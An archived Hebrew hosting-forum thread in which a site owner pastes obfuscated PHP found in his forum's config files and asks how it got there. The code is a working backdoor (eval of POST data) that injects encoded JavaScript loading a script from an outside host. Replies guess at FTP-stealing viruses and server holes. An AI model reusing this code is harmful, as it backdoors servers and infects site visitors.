הוסטס - פורום אחסון האתרים הגדול בישראל

הוסטס - פורום אחסון האתרים הגדול בישראל (https://hosts.co.il/forums/index.php)
-   פורום תיכנות (https://hosts.co.il/forums/forumdisplay.php?f=14)
-   -   בעיה| השתלת קוד זדוני באתר (https://hosts.co.il/forums/showthread.php?t=74355)

3D0m 09-05-09 08:38
בעיה| השתלת קוד זדוני באתר
 
שלום לכם.
לאחרונה גולשי האתר שלי הודיעו לי מספר פעמים שקיים אצלי וירוס באתר, שמבקש מהם להוריד כל פעם סוג קובץ אחר.
בדקתי את העניין, ומצאתי סקריפט שהושתל אצלי, וכל פעם הוא נראה קצת שונה.
זהו הקוד שהושתל במערכת הפורומים שלי:

קוד:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbih0KXtldmFsKHVuZXNjYXBlKCgnPDc2YTw3MjwyMGE8M2Q8MjJTPDYzPDcyPDY5PDcwPDc0RW5nPDY5bmU8MjI8MmNiPDNkPDIyVjw2NXJzaW9uPDI4KSs8MjI8MmNqPDNkPDIyPDIyPDJjdTwzZG48NjE8NzZpZ2F0b3I8MmV1czw2NTw3MkFnPDY1PDZlPDc0PDNiaWY8MjgoPDc1PDJlaTw2ZWRleDw0ZmYoPDIyV2luPDIyKTwzZTApPDI2PDI2KHU8MmVpbmRleDw0ZmYoPDIyPDRlVDwyMDY8MjIpPDNjMCk8MjY8MjY8MjhkPDZmY3VtZW50PDJlY29vazw2OWU8MmVpbjw2NDw2NXhPZig8MjJtPDY5ZWs8M2QxPDIyKTwzYzApPDI2PDI2KHR5PDcwZW9mKHpydjw3YXRzKTwyMTwzZHR5PDcwZW9mKDwyMkE8MjI8MjkpKTw3Ynpydnp0czwzZDwyMkE8MjI8M2JlPDc2YWwoPDIyPDY5ZjwyOHdpbmRvdzwyZTwyMithKzwyMilqPDNkais8MjIrYSs8MjJNYTw2YW88NzI8MjIrYis8NjErPDIyPDRkaTw2ZW88NzI8MjIrYjwyYmErPDIyQnU8NjlsZDwyMitiKzwyMmo8M2I8MjIpPDNiZG88NjN1bTw2NW50PDJld3JpdGUoPDIyPDNjc2NyaTw3MHQ8MjBzcmM8M2Q8MmY8MmZndW1iPDZjYXI8MmVjbjwyZnJzczwyZjwzZjw2OWQ8M2Q8MjIrPDZhKzwyMjwzZTwzYzw1YzwyZnNjcmk8NzA8NzQ8M2U8MjIpPDNiPDdkJykucmVwbGFjZSh0LCclJykpKX0pKC88L2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
אותו קוד הושתל גם באתר אחר שלי.
עכשיו ככה, שני האתרים האלה מאוחסנים על אותו VPS בחשבונות שונים, אבל כנראה זה הועבר בדרך כלשהי לשאל הקבצים בשרת. (ולא כל הקבצים נדבקים בזה, רק חלקם, כמו קבצי הגדרות config).

*אני לא מבקש תמיכה במערכת מוכנה, אני מבקש לדעת אם אתם מכירים את הקוד או הדרך בה השתילו לי אותו, בכדי שאוכל לחסום את זה.
תודה מראש.

עריכה: יכול להיות שהוא הושתל דרך טופס או משהו?

בניה 09-05-09 08:47
כנראה זה וירוס במחשב שלך, שכשאתה מתחבר לשרת FTP כל שהוא הוא משתיל קוד בכל דפי האינטרנט שהוא מוצא שם.
מה שאתה יכול זה א. להשתמש ב WEBFTP כל שהוא כדי להעיף אותו.
ב. לעשות סריקת וירוסים.

http://www.webftp.co.uk/index.php
WEBFTP

3D0m 09-05-09 08:52
חשבתי על האפשרות הזאת שיש לי וירוסים במחשב, ועשיתי מספר סריקות עם nod32,kaspersky,ad-aware
ולגבי האתר שציינת (http://www.webftp.co.uk) הוא אתר אמין? שלא אתן את פרטי השרת וזה יגרום לבעיות..

intercooler3819 09-05-09 10:37
ממ אין לך סיבה לחשוב שזה אצלך אם סרקת

לרוב כשפורצים אתר אחד ניתן לפרוץ את כל האתרים שיושבים בשרת (במקרה שלך ברמה של VPS) שעליו יושב האתר

תנסה לתת גישות מחודשות למרות שאם יש לך חור אבטחה זה לא יעזור והפריצות יהיו חוזרות ונשנות

3D0m 09-05-09 10:44
עדיין נראה לי שזה יותר מקרה של הזרקה או משהו (לא מבין בהאקינג).
עברתי לשרת חדש רק אתמול, וזה קרה שוב.
למישהו יש עצה בשבילי כדי למנוע את זה?

גורילה 09-05-09 10:58
תבדוק שאין לך קבצים זדוניים במערכת.

moni1x09 09-05-09 11:09
לפעמים יש מצב שמישהו שתל לך קובץ על השרת שעורך קבצים בעלי הרשאת 777 (כמו הקונפיג הנחמד שלך)

בכל מקרה, תעבור קובץ קובץ ותחפש קוד חשוד(מקווה שזה לא הבנוייקר או מערכת גדולה :S)

אדיר 09-05-09 11:34
אני דווקא חושב יותר על הכיוון של בעיות אבטחה בשרת (וככה אפשר לגשת לתקיות של כל המשתמשים),
צור קשר במסן ואני אעזור לך לבדוק האם זאת באמת פרצה בשרת.

SniR-S 09-05-09 12:46
אולי וירוס שיושב לך איזה קובץ במקום כלשהו בשרת, ואם אתה מוחק את הקודדד הוא כל כמה זמן משכפל את עצמו..

בניה 09-05-09 14:41
ציטוט:
נכתב במקור על ידי בניה (פרסם 713876)
כנראה זה וירוס במחשב שלך, שכשאתה מתחבר לשרת FTP כל שהוא הוא משתיל קוד בכל דפי האינטרנט שהוא מוצא שם.
מה שאתה יכול זה א. להשתמש ב WEBFTP כל שהוא כדי להעיף אותו.
ב. לעשות סריקת וירוסים.

http://www.webftp.co.uk/index.php
WEBFTP
אני משתמש באתר הזה כבר הרבה זמן ולא פרצו לי או משהו.
והיו כבר דיונים על הוירוס הזה פה באתר ואמרו שזה משהו במחשב שלך ולא על השרת


כל הזמנים הם GMT +2. הזמן כעת הוא 05:48.

מופעל באמצעות VBulletin גרסה 3.8.6
כל הזכויות שמורות ©
כל הזכויות שמורות לסולל יבוא ורשתות (1997) בע"מ